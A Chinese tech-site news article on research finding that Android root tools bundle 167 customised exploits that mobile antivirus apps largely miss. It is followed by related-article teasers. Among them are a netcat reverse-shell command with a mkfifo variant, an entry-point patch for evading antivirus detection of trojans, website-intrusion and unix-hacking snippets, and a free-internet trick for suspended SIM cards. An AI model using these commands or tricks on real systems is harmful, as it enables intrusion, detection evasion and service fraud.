手机root好不好?手机root为漏洞利用打开方便之门
也许你的手机ROOT只是为了安装一款游戏,安装一个工具。对我们普通人来说,ROOT代表着方便和自由,其实你不知道的是,它同时也为黑客带来了侵犯你隐私的方便和自由。看看ROOT后的手机是怎样为漏洞大开方便之门的。
即使当所有信息都被披露,安卓Root应用开发商还是存在不为人知的一面。
ROOT也为漏洞利用打开方便之门
最新研究发现,通过推广强大的Root利用程序,为数不多的应用程序经销商正在将数以百万计的安卓用户置于十分危险的境地。Root程序会很容易被逆向工程,让恶意软件利用漏洞利用工具绕过安卓的重要安全检测。
周四,来自加州河滨分校的研究人员在ACM计算机与通信安全会议上发表了题为《安卓Root及其供应商:一把双刃剑》的报告,他们花了一个月的空闲时间逆向工程了一个Root工具包含的167个漏洞。最终研究者得出结论,root供应商通过提供了大量种类繁多、高度定制的漏洞利用很容易导致逆向工程,并难以检测,这提升了所有安卓用户的安全风险。
而在中国,安卓Root非常流行,主流开发商都参与到了Root工具开发,比如Root精灵、IRoot、360的一键Root以及Kingroot等等,这些Root程序帮助安卓用户不受手机运营商或者制造商的限制。为此,Root供应商们针对运行特定版本安卓系统的特定硬件设备收集大量的漏洞利用。
手机杀毒软件检测结果
供应商的代码通常包括已知的最先进的漏洞利用,例如TowelRoot(又称futex)、Pingpong Root和Gingerbreak。这些漏洞利用正常情况下都会被安卓杀毒应用程序封锁。但是由于Root供应商进行了改进,这些专业开发的漏洞利用便不容易被检测到。而更糟的情况是,许多现成的漏洞利用被直接用于攻击未公开的安卓安全缺陷。
ROOT:一把双刃剑
来自加州大学河滨分校的研究者在论文中提出:
“我们发现他们不仅仅努力融入和整合已知漏洞利用,为保持竞争力同时还开发新的利用。然而,这些精致的漏洞利用并没有得到很好的保护,一旦落入错误的人手中将会造成极其危险的影响。”
研究者将相同的167个漏洞利用捆绑放进一个自主研发的应用程序当中,检测安卓杀毒程序(AV)是否能够检测到。每个利用以三种不同方式暴露于杀毒程序面前——从root供应商网站下载的原始exp,一个直接暴露于AV引擎的脱壳exp,以及恶意软件经常使用的加壳exp。检测结果显示,四款AV产品只有来自趋势科技的一个程序检测到了exp,其测试结果为167中的13个exp,并且都是脱壳当中。
·N:没有检测出威胁 ·检测中的所有反病毒软件都是最新版本
研究人员在报告中写道:
“这些反病毒软件没有检测出任何加壳exp的结果真令人失望。这可能是由于供应商自定义模糊程序,exp没有被识别出。然而,即使是脱壳exp,只有趋势科技从167个当中识别出13个文件标记为恶意。值得一提的是,高度危险的futex利用与PingPongroot利用都没有被任何反病毒软件抓到。”
其他的AV程序分别来自于Lookout、AVG和赛门铁克。需要说明一点,这份报告写于今年5月,测试中的这些产品可能在这之后进行了更新,或许已经可以检测出全部、或一部分的利用。
即使我们的乐观推测为真,报告中仍然非常强调root应用供应商本应该充分保护其包含的可利用漏洞,但在实际中这些漏洞可以被恶意程序作者轻而易举的拿来用。
microsoft excel内存破坏、执行任意指令怎么办?
受影响系统: Microsoft Excel Viewer 2003 Microsoft Excel 2007 Microsoft Excel 2003 SP2 Microsoft Excel 2002 SP3 Microsoft Excel 2000 SP3 Microsoft Office 2004 for Mac 描述: ------------------------------------------------------
详情2018-01-10 14:59:53责编:llp 来源:驱动管家木马免杀有哪些绝招?木马免杀的五大绝招
常用的木马免杀方法绝招一:快速搞定瑞星文件查杀操作步骤: 第一步:用OD载入,来到程序的入口点。 第二步:把入口点的第一句PUSH EBP 改成POP EBP 然后保存就可以躲过瑞 星的表面查杀。绝招二:快速定位
详情2018-01-07 09:11:57责编:llp 来源:驱动管家怎么入侵unix操作系统?unix操作系统的入侵步骤
偶然的机会发现了一篇名为hacking unix的文章,大概看了看觉得价值十分的大,所以决定翻译出来,我觉得这篇文章一定能够成为中国unix黑客的基石 呵呵,也许有点夸大,不过等你看完了这篇文章以后,你的态度绝对会有
详情2018-01-04 15:53:55责编:llp 来源:驱动管家android平台的漏洞 什么是sql注入漏洞?
0x0前言14年11月笔者在百度xteam博客中看到其公开了此前报告给Google的CVE-2014-8507漏洞细节——系统代码在处理经由短信承载的WAP推送内容时产生的经典SQL注入漏洞,影响Android 5 0以下的系统。于是对这个漏洞
详情2018-01-06 15:28:03责编:llp 来源:驱动管家游戏交易网怎么被入侵?游戏交易网的入侵方法
在这次入侵之前我已经拿到过一次这个网站的shell了,但是被删除了,由于不甘心又拿了一次,才有了下面的过程一: 踩点 收集信息因为这个已经是第二次入侵,所以具体的信息我已经基本上掌握服务器上13个站点,大多数站
详情2018-01-04 14:30:43责编:llp 来源:驱动管家什么是openvpn漏洞?openvpn漏洞的危害
OpenVPN桌面客户端爆CSRF漏洞(可远程执行命令)受影响版本:windows版本的OpenVPN Access Server "Desktop Client " app。版本号为1 5 6(漏洞发现时的最新版)及以前的版本。OpenVPN Connect,Private Tunne
详情2018-01-03 13:38:05责编:llp 来源:驱动管家后门木马的查找教程 手工怎么查找后门木马?
后门木马又称特洛伊木马(Trojan horse),是一种基于远程控制的黑客工具。包括客户端和服务端。一起来看看手工查找后门木马的教程吧。1、首先最需要注意的地方是系统的启动项,可以在“运行”-输入“msconfig命
详情2018-01-06 11:53:37责编:llp 来源:驱动管家unix系统怎么使用自带nc工具反弹shell?
NC的原生做法:nc -l -vv -p 2222 -e bin bash无法使用NC反弹的时候可以这样先在tmp创建一个普通管道mknod tmp backpipe p或者mkfifo tmp backpipe p然后管道一边接入shell,一变用NC反弹到攻击者主
详情2018-01-10 10:48:14责编:llp 来源:驱动管家手机停机也可以上网?手机免费上网攻略
手机停机一样可以无限量免费上网现在向大家透露一个如何激活已停机卡的方法!?激活了以后就可以免费上网了。注:《本人动感地带的卡已测,通过》!首先,准备一张已经欠费停机的卡。注意重点:《1、需要知道卡的
详情2018-01-09 15:11:13责编:llp 来源:驱动管家怎么改ip地址?改ip地址的具体步骤
第一步:右键点击桌面“网络”,单击“属性”,出现如下“网络和共享中心”。(图 1)第二步:在对应的网络连接右边点击“查看状态”。(也可以点击“管理网络连接”,如果您是通过有线的方式连接路由器,右键单
详情2018-01-06 17:39:19责编:llp 来源:驱动管家
- 什么是wannacry病毒?wannacry病毒蠕虫分析报告
- 为什么电脑不能识别插入的USB设备?USB无法识别的解决办法
- 无线网卡驱动要不要经常更新?win10更新无线网卡驱动的方法步骤
- PDF文件加密后怎样解密?PDF文件解密方法
- 微博看大图不清晰是怎么回事?微博看大图不清晰怎么解决?
- 电源风扇声音大代表你的电源风扇要清理了
- 技嘉主板在开机的时候为什么会发出长鸣报警声
- u盘插电脑没反应是驱动的问题还是其他问题?怎么解决
- 399元的手机:红辣椒任性版的基础配置是什么样的?
- 电脑开机黑屏只能看到鼠标是怎么回事?电脑开机黑屏怎么解决?
- 怎么使用、创建和维护oracle密码文件? oracle创建用户的方法
- USB闪存驱动器也能登录win7系统?这或许更方便安全
- 斗鱼直播间为什么被关闭?斗鱼直播间被关闭原因是什么?
- 微信公众平台登录界面怎么打开?怎么登陆 微信公众平台?
- 关于envision显示器你了解多少了呢?envision显示器应该怎么调
- 用华硕笔记本自带摄像头拍出来的东西为什么是倒立的
- 电脑桌面图标有蓝底怎么去掉?最简单的方法是这样
- iphone6国行迟迟未上市的原因是入网许可未获批
- usb无线网卡设置的方法是什么?usb无线网卡使用方法
- 打开电脑的六种方法 原来打电话也能开计算机